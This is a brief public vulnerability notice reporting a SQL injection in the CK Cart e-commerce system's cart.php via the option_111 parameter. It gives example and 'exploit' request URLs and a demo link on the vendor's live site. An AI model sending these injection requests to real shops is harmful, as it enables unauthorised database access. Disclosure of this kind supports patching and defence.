# Exploit Title: CK Cart (E-Commerce System) SQL Injection # Date: 19.08.2011 # Author: Eyup CELIK # Software Link: http://www.ckcart.com/ # Version: All Version # Tested on: All versions are Vulnerability ISSUE SQL Injection can be done using the command input Vulnerable Page: cart.php Example: cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24&quantity=1&submit=Order Exploit: cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24'1&quantity=1&submit=Order Demo: http://www.ckcart.com/cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24&quantity=1&submit=Order Thanks, Eyup CELIK Bilgi Teknolojileri Güvenlik Uzmani http://www.eyupcelik.com.tr